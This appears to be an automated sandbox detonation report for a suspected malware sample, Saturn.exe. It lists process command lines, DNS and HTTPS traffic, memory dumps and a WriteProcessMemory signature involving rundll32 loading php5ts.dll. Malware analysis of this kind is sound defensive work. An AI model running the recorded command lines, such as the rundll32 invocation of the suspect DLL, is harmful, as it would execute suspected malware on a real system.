C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Saturn.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Saturn.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3780 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3f4 0x40c
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.212.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
Files
memory/3688-0-0x0000000074F30000-0x00000000756E0000-memory.dmp
memory/3688-1-0x00000000005A0000-0x00000000005E6000-memory.dmp
memory/3688-2-0x00000000056A0000-0x0000000005C44000-memory.dmp
memory/3688-3-0x0000000005000000-0x0000000005092000-memory.dmp
memory/3688-4-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/3688-5-0x0000000004FF0000-0x0000000004FFA000-memory.dmp
memory/3688-6-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/3688-7-0x0000000074F30000-0x00000000756E0000-memory.dmp
memory/3688-8-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/3688-9-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/3688-10-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/3688-11-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/3688-12-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/3688-13-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/3688-14-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2492 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$1\1337\php5ts.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$1\1337\php5ts.dll,#1